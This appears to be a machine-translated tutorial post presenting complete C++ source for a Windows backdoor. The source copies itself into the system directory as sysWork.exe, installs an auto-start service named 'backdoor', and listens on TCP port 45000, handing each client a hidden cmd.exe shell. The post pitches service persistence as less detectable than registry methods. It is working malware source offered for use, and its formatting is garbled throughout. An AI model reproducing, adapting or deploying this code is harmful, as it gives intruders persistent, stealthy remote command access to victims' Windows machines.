Secure Road--c/c++ realize backdoor service self-start

Brief introduction

Windows NT system Backdoor to implement self-booting, there are many ways, such as the registry self-boot , image hijacking technology ,svchost self-booting and the introduction of this section of the Service self-initiated methods, The service self-priming is less likely to be discovered than the three other types of startup methods needed to modify the registry.

Examples of C + + code

filename:serviceautorundemo.cpp//Creator: peterz1997//date:2018-5-4 23:19//comment:create Service to make the backdoor Run automatically////////////////////// #include <iostream> #include <WinSock2.h> #include < winsock.h> #include <windows.h> #include <Winsvc.h> #include <cstdio> #include <cstring># pragma comment (lib, "Ws2_32.lib") using namespace std; #define Service_op_error-1#define Service_already_run-2const unsigned int max_count = 255;           String Max lengthconst DWORD PORT = 45000; Listen portconst unsigned int link_count = 30; Max Link numberservice_status g_servicestatus; Service_status_handle g_hservicestatus;/** * @brief CallBack Function to Translate Service Control Code * @param dwcode Se Rvice Control Code */void WINAPI servicecontrol (DWORD dwcode) {switch (Dwcode) {//service pause case Service_conTROL_PAUSE:g_ServiceStatus.dwCurrentState = service_paused;        Break        Service Continuation Case SERVICE_CONTROL_CONTINUE:g_ServiceStatus.dwCurrentState = service_running;        Break        Service Stop Case SERVICE_CONTROL_STOP:g_ServiceStatus.dwCurrentState = service_stopped;        G_servicestatus.dwwin32exitcode = 0;        G_servicestatus.dwcheckpoint = 0;        G_servicestatus.dwwaithint = 0;    Break    Case Service_control_interrogate:break;    Default:break;  }//Set service state if (SetServiceStatus (g_hservicestatus, &g_servicestatus) = = 0) {printf ("Set service status    Error\n "); } return;     /** * @brief Start Remote Shell * @lpParam the Client Handle */dword WINAPI Startshell (lpvoid lpparam) {startupinfo si;    Process_information Pi;    CHAR Cmdline[max_count] = {0};    Getstartupinfo (&AMP;SI);    SI.CB = sizeof (STARTUPINFO);    Si.hstdinput = Si.hstdoutput = Si.hstderror = (HANDLE) Lpparam; Si.dwflags = STArtf_useshowwindow |    Startf_usestdhandles;    Si.wshowwindow = Sw_hide;    GetSystemDirectory (cmdline, sizeof (cmdline));    strcat_s (cmdline, sizeof (CmdLine), "\\cmd.exe"); while (!    CreateProcess (NULL, cmdline, NULL, NULL, TRUE, NULL, NULL, NULL, &AMP;SI, &AMP;PI)) {Sleep (100);    } WaitForSingleObject (Pi.hprocess, INFINITE);    CloseHandle (pi.hprocess);    CloseHandle (Pi.hthread); return 0;} /** * @brief Service Running Function * @lpParam NULL */dword WINAPI runservice (lpvoid lpparam) {CHAR Wmessage[max_coun    T] = "<================= Welcome to back Door >_< ==================>\n";    SOCKET sclient[30];    DWORD dwthreadid[30];    HANDLE hthread[30];    Wsadata WSD;        if (WSAStartup (0x0202, &AMP;WSD)) {printf ("WSAStartup Process error\n");    return 0;    } SOCKET Slisten = WSASocket (Af_inet, Sock_stream, ipproto_tcp, NULL, 0, 0);    Sockaddr_in sin;    sin.sin_family = af_inet;    Sin.sin_port = htons (port); Sin.sin_addr. S_un. S_aDDR = Inaddr_any;    if (Bind (Slisten, (lpsockaddr) &sin, sizeof (SIN))) return 0;    if (Listen (Slisten, link_count)) return 0;        for (int i = 0; i < Link_count; i++) {Sclient[i] = accept (Slisten, NULL, NULL);        Hthread[i] = CreateThread (NULL, 0, Startshell, (LPVOID) sclient[i], 0, &dwthreadid[i]);    Send (Sclient[i], Wmessage, strlen (Wmessage), 0);    } waitformultipleobjects (Link_count, Hthread, TRUE, INFINITE); return 0;}    /** * @brief The Main Function of the Service */void WINAPI servicemain (DWORD dwargc, LPTSTR *lpargv) {HANDLE hthread;    G_servicestatus.dwcheckpoint = 0; g_servicestatus.dwcontrolsaccepted = Service_accept_pause_continue |    Service_accept_stop;    G_servicestatus.dwcurrentstate = service_start_pending;    G_servicestatus.dwservicespecificexitcode = 0;    G_servicestatus.dwservicetype = Service_win32;    G_servicestatus.dwwaithint = 0;    G_servicestatus.dwwin32exitcode = 0; G_hservicestatus = RegisterServiceCtrlHandler ("Backdoor ", ServiceControl);        if (!g_hservicestatus) {printf ("Register Service error\n");    Return    } g_servicestatus.dwcurrentstate = service_running;    G_servicestatus.dwcheckpoint = 0;    G_servicestatus.dwwaithint = 0; if (!        SetServiceStatus (G_hservicestatus, &g_servicestatus)) {printf ("Set servicestatus Error!\n");    Return    } hthread = CreateThread (null, 0, runservice, NULL, 0, NULL);    if (!hthread) {printf ("Create Thread error\n"); } return;    /** * @brief Install Service */int apientry installservice () {DWORD dwerrorcode;    Sc_handle Hscmanager;    Sc_handle Hservicehandle;    Service_status Ssservicestatus;    CHAR Szsystempath[max_count] = "n";    CHAR Szfileselfpath[max_count] = "n";    GetSystemDirectory (Szsystempath, sizeof (Szsystempath));    GetModuleFileName (NULL, Szfileselfpath, sizeof (Szfileselfpath));    strcat_s (Szsystempath, "\\sysWork.exe"); CopyFile (Szfileselfpath, Szsystempath, true);   Hscmanager = OpenSCManager (null, NULL, sc_manager_all_access);        if (!hscmanager) {printf ("Can not Open the Service manager\n");    return service_op_error;    } printf ("Service Manager opened success\n"); Hservicehandle = CreateService (Hscmanager, "backdoor", "backdoor", service_all_access, Service_win32_own_process,    Service_Auto_Start, Service_error_ignore, szsystempath, NULL, NULL, NULL, NULL, or NULL);        if (!hservicehandle) {Dwerrorcode = GetLastError (); if (Dwerrorcode = = error_service_exists) {hservicehandle = OpenService (Hscmanager, "backdoor", Service_            all_access);                if (!hservicehandle) {printf ("Can not Create/open service\n");                Closeservicehandle (Hservicehandle);            return service_op_error;            } else {printf ("Service opened success\n"); }}} else {printf ("Service Create success\n "); } if (!        StartService (hservicehandle, 0, NULL)) {Dwerrorcode = GetLastError ();            if (Dwerrorcode = = error_service_already_running) {printf ("Serveice is already running\n");            Closeservicehandle (Hservicehandle);            Closeservicehandle (Hscmanager);        return service_already_run;            } else {printf ("Serveice START error\n");            Closeservicehandle (Hservicehandle);            Closeservicehandle (Hscmanager);        return service_op_error; }} while (QueryServiceStatus (Hservicehandle, &ssservicestatus)) {if (ssservicestatus.dwcurrentstate            = = service_start_pending) {Sleep (100);        Continue } if (ssservicestatus.dwcurrentstate! = service_running) {printf ("SERVICE Start Process error\n"            );            Closeservicehandle (Hservicehandle);            Closeservicehandle (Hscmanager); Return SERVICe_op_error;        } else {break; }} if (!        QueryServiceStatus (Hservicehandle, &ssservicestatus)) {printf ("Service Status Get error\n");        Closeservicehandle (Hservicehandle);        Closeservicehandle (Hscmanager);    return service_op_error;    } printf ("Service Start success\n");    Closeservicehandle (Hservicehandle);    Closeservicehandle (Hscmanager); return 0;}    /** * @brief Remove Service */int removeservice () {Sc_handle hscmanager;    Sc_handle Hservicehandle;    Service_status Ssservicestatus;    Hscmanager = OpenSCManager (null, NULL, sc_manager_all_access);        if (!hscmanager) {printf ("Open Service Manager error\n");    return service_op_error;    } printf ("Open Service Manager success\n");    Hservicehandle = OpenService (Hscmanager, "backdoor", service_all_access);        if (!hservicehandle) {printf ("Open Service error\n");    return service_op_error; } printf ("Open Service Success\n "); if (QueryServiceStatus (Hservicehandle, &ssservicestatus)) {if (ssservicestatus.dwcurrentstate = = SERVICE_RU        nning) {ControlService (Hservicehandle, Service_control_stop, &ssservicestatus);        }} else {printf ("Service Status Get error\n");        Closeservicehandle (Hservicehandle);        Closeservicehandle (Hscmanager);    return service_op_error; } if (!        DeleteService (Hservicehandle)) {printf ("Delete Service error\n");        Closeservicehandle (Hservicehandle);        Closeservicehandle (Hscmanager);    return service_op_error;    } printf ("Remove Service success\n");    Closeservicehandle (Hservicehandle);    Closeservicehandle (Hscmanager); return 0;} /** * @brief main Function */int main (int argc, char* argv[]) {service_table_entry svtable[] = {{(LPSTR) "Backdo    or ", ServiceMain}, {null,null}};    StartServiceCtrlDispatcher (svtable); if (argc = = 2) {if (!STRICMP (argv[1], "--install")) {if (installservice () = = Service_op_error) {printf ("[!]            Service Operation Error\n ");            } else {printf ("[*]service Operation Success\n");            }} else if (!stricmp (argv[1], "--remove")) {if (removeservice () = = Service_op_error) {printf ("[!]            Service Operation Error\n ");            } else {printf ("[*]service Operation Success\n");        }} else {printf ("[Usage] = *.exe [--install]/[--remove]\n");    }} else {printf ("[Usage] = *.exe [--install]/[--remove]\n"); } return 0;}

Secure Path--c/c++ implement backdoor service self-start